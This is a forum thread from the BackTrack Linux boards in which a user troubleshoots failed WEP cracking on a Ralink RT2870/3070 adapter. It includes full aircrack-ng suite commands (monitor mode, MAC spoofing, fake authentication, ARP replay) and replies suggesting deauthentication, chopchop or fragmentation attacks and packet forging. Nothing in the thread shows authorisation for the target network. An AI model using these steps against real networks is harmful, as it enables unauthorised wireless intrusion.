Results 1 to 9 of 9

Thread: Ralink RT2870/3070 - "got 0 ARP requests,0 packets send"

  1. #1
    Just burned his ISO
    Join Date
    May 2012
    Posts
    6

    Question Ralink RT2870/3070 - "got 0 ARP requests,0 packets send"

    Hello everyone.

    First of all I made a seach in the wiki and in this forum but I didn't find anything relevant. In google there are many people having my same problem but the only solution I found is "enable monitor mode and wait" but it doesn't work for me.

    >> Introduction:
    I'm using Backtrack 5 R2 (live cd). GNOME. Architecture: 64-bit
    My chipset is Ralink RT2870/3070 and according to official wiki works: http://www.backtrack-linux.org/wiki/..._working_cards

    I also tried by myself injection test ( aireplay-ng -9 wlan1 ) and it says "injection working!" and then lists the AP available (I did this after chanching the channel of my interface to the channel where the target AP is: iwconfig wlan1 channel 6 (it is wlan1,and not wlan0,because I have two wireless adapters)

    My problem is that airodump gets many packets but "0 ARP requests" and "send 0 packets"

    >> Details
    (of course where I say <my fake mac>,<my target mac> etc.. is just for privacy,but I wrote the correct MacS
    There is was I did:

    airmon-ng start wlan1

    Code:
    Interface	Chipset		Driver
    
    wlan1		Ralink RT2870/3070	rt2800usb - [phy1]
    				(monitor mode enabled on mon0)
    wlan0		Atheros AR9285	ath9k - [phy0]

    aireplay-ng -9 mon0

    Code:
    04:50:57  Trying broadcast probe requests...
    04:50:57  Injection is working!
    04:50:59  Found 10 APs
    
    04:50:59  Trying directed probe requests...
    04:50:59  <mac> - channel: 6 - 'AP_NAME'
    04:50:59  Ping (min/avg/max): 1.418ms/3.128ms/7.077ms Power: -67.87
    04:50:59  30/30: 100%
    
    < More AP >
    airmon-ng start mon0 6

    Code:
    Interface	Chipset		Driver
    
    mon0		Ralink RT2870/3070	rt2800usb - [phy1]
    				(monitor mode enabled on mon1)
    wlan1		Ralink RT2870/3070	rt2800usb - [phy1]
    wlan0		Atheros AR9285	ath9k - [phy0]
    ifconfig mon0 down
    macchanger --mac <fake mac> mon0

    Code:
    Current MAC: <my wlan1/mon0/mon1 true mac> (<mac producer>)
    Faked MAC:   <fake mac> (unknown)
    airodump-ng -c 6 -w wep123 --bssid <my target mac> mon1

    (Partial output,I can't copy-paste from the window due to it refreshs every second)
    Code:
    ***
    CH 6 ] [Elapsed: 3 mins] <date> <hour>
    BSSID PWR ......
    <my target mac> -37 24 ....
    
    BSSID STATION ......
    ==> ctrl+shift+N to Open a new console (second console):

    aireplay-ng -1 0 -a <mac of target> -h <fake mac> mon1

    Code:
    05:11:45  Sending Authentication Request (Open System) [ACK]
    05:11:45  Authentication successful
    05:11:45  Sending Association Request [ACK]
    
    <looping the same 3 lines..>
    After this I noticed a new line appeared in the first console***

    Updated code:
    Code:
    ***
    CH 6 ] [Elapsed: 3 mins] <date> <hour>
    BSSID PWR ......
    <my target mac> -37 24 ....
    
    BSSID STATION .....
    <target mac> <my fake mac> ...
    ==> ctrl+shift+N to Open a new console (third console):

    aireplay-ng -3 -b <mac of target> -h <fake mac> mon1

    Code:
    05:16:45  Waiting for beacon frame (BSSID: <mac of the target>) on channel 6
    Saving ARP requests in replay_arp-0518-051645.cap
    You should also start airodump-ng to capture replies.
    Read 5797 packets (got 0 ARP requests and 25 ACKs), sent 0 packets...(0 pps)
    And even when 80000 packets have been read still 0 ARP and 0 sent and 0 pps.

    Finally I tried (in a fourth window):

    aircrack-ng -b <mac of target> replay_arp-0518-051645.cap

    Code:
    Opening replay_arp-0518-051645.cap
    No matching network found - check your bssid.
    
    
    Quitting aircrack-ng...
    The solutions I tried is to do:
    - airodump-ng -c 6 -w wep123 --bssid <my target mac> mon0 (and also in the following using mon0 instead of mon1)
    - I tried to use my true mac and also the fac mac in combination with mon 0 and/or mon1
    - I tried to first start capturing packet,then putting in

    But the result is always the same.

    Thank you for any hint!
    Regards

  2. #2
    Administrator sickness's Avatar
    Join Date
    Jan 2010
    Location
    Behind the screen.
    Posts
    2,921

    Default Re: Ralink RT2870/3070 - "got 0 ARP requests,0 packets send"

    I would suggest that you go to the aircrack official website and document yourself more about what this attack does, you are missing one of the key steps in getting it to work so in your case it's normal that you can not capture ARP requests.
    Back|track giving machine guns to monkeys since 2007 !

    Do not read the Wiki, most your questions will not be answered there !
    Do not take a look at the: Forum Rules !

  3. #3
    Just burned his ISO
    Join Date
    May 2012
    Posts
    6

    Question Re: Ralink RT2870/3070 - "got 0 ARP requests,0 packets send"

    Quote Originally Posted by sickness View Post
    I would suggest that you go to the aircrack official website and document yourself more about what this attack does, you are missing one of the key steps in getting it to work so in your case it's normal that you can not capture ARP requests.
    @sickness First of all thank you very much for answering.
    I'd like to ask you: what step am I missing?
    I've already followed various tutorials (from different sources) and of course made some searches in aircrack website but I'm confused.. I really don't have any idea what I'm doing bad. I don't pretend that you tell me exactly "what command to write" but please tell me what "action" is missing

    Thank you very much for helping
    Regards

  4. #4
    Just burned his ISO
    Join Date
    May 2012
    Posts
    6

    Default Re: Ralink RT2870/3070 - "got 0 ARP requests,0 packets send"

    Quote Originally Posted by dragmnl123 View Post
    @sickness First of all thank you very much for answering.
    I'd like to ask you: what step am I missing?
    I've already followed various tutorials (from different sources) and of course made some searches in aircrack website but I'm confused.. I really don't have any idea what I'm doing bad. I don't pretend that you tell me exactly "what command to write" but please tell me what "action" is missing

    Thank you very much for helping
    Regards
    any hint please? I looked in aircrack web site but really I can't understand what's missing..

  5. #5
    Very good friend of the forum maverik35's Avatar
    Join Date
    Sep 2009
    Location
    Debian land
    Posts
    734

    Default Re: Ralink RT2870/3070 - "got 0 ARP requests,0 packets send"

    What router are you auditing?..

    Try another attack, you are using the Fake Auth attack..Try chop-chop, fragmentation, interactive packet.

    Not all injected packets are allowed by router..That is why is not capturing any packets, because the router is not accepting the injected packets, therefore no Initialization Vectors are issued by router (IV's)...Try another attack...This is not as simple as "I'm injecting", "Easy as 123"..No, please, no...Do not take anything for granted...

    You try to attack and if it fails, try another attack...Analyze info from airodump-ng before attacking with airoplay-ng. Please, also try to read all info in airodump is showing in your terminal....

    Read here: http://www.aircrack-ng.org/doku.php?id=aireplay-ng.

    good Luck...

  6. #6
    Senior Member ShadowMaster's Avatar
    Join Date
    Jul 2011
    Location
    /root
    Posts
    189

    Default Re: Ralink RT2870/3070 - "got 0 ARP requests,0 packets send"

    You need to generate arp traffic to use an arp replay attack. Either deauth a client, or if there is none, korek or chopchop to get the keystream, and packetforge a fake arp then replay. At this point using a -3 attack as opposed to a -2 -r [fake arp] is stupid, but theoretically it can be done. The step you are missing is having real traffic generated and playing with it...

    @sickness: TRY HARDER FTW!!!
    World Domination is such an ugly phrase. I prefer the term World Optimization.

  7. #7
    Just burned his ISO
    Join Date
    May 2012
    Posts
    6

    Default Re: Ralink RT2870/3070 - "got 0 ARP requests,0 packets send"

    @ShadowMaster Could you speak more clearly to a "newbye"? For example...wha'ts korek? And packetforge?
    @maverik35 Well..I don't know router model. And finally I got ARP response.. simply repeating many times the steps i told in the beggining . I also tried every other attack avalaible in aireplay-ng .. The only "result" has been with attack "ARP replay" (-3), I got many Iv's (as much as 7000-8000 in 5-6-7 hours) but neither with aircrack-ptw neither with aircrack-ptw I got the key..

    However I'll try more times

  8. #8
    Senior Member ShadowMaster's Avatar
    Join Date
    Jul 2011
    Location
    /root
    Posts
    189

    Default Re: Ralink RT2870/3070 - "got 0 ARP requests,0 packets send"

    korek==chopchop==-4 or -5 don't recall which. the other is the packet fragmentation attack. Either one will get you a prga keystream .xor that you can then use with packetforge to forge an arp packet to inject with -2 -r [packet]. Also 7000-8000 is in general nowhere near enough to crack... When you successfully use -5 or -4 to gain a PRGA keystream, then either look up packetforge usage or post again here for further info.
    World Domination is such an ugly phrase. I prefer the term World Optimization.

  9. #9
    Just burned his ISO
    Join Date
    Jun 2012
    Posts
    1

    Unhappy Re: Ralink RT2870/3070 - "got 0 ARP requests,0 packets send"

    brother I have the same problem I have wairless dlink dwa-125 chipset RT2870/3070
    you managed to have invaded a WEP key??how?

Similar Threads

  1. BT 5 R2 - Ralink 2870/3070 no longer supported
    By Osirium in forum Non Working Hardware
    Replies: 6
    Last Post: 04-29-2012, 11:32 AM
  2. MDK3 problem with RT2870/3070 (alfa awus036nh)
    By Miyamoto in forum BackTrack 5 General Topics
    Replies: 0
    Last Post: 03-30-2012, 09:56 PM
  3. Belkin F5D8053 v3 (Ralink RT2870/3070 - rt2800usb)
    By g0tmi1k in forum Working Hardware
    Replies: 0
    Last Post: 10-12-2011, 04:28 PM
  4. Ralink 3070 - Doesn't work after monitor mode
    By Code7 in forum OLD BackTrack 4 NON working hardware
    Replies: 2
    Last Post: 12-19-2009, 01:12 PM
  5. Non working RT3070 (Ralink Chipset 3070)
    By matisse_hu in forum OLD BackTrack 4 NON working hardware
    Replies: 6
    Last Post: 07-17-2009, 01:08 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •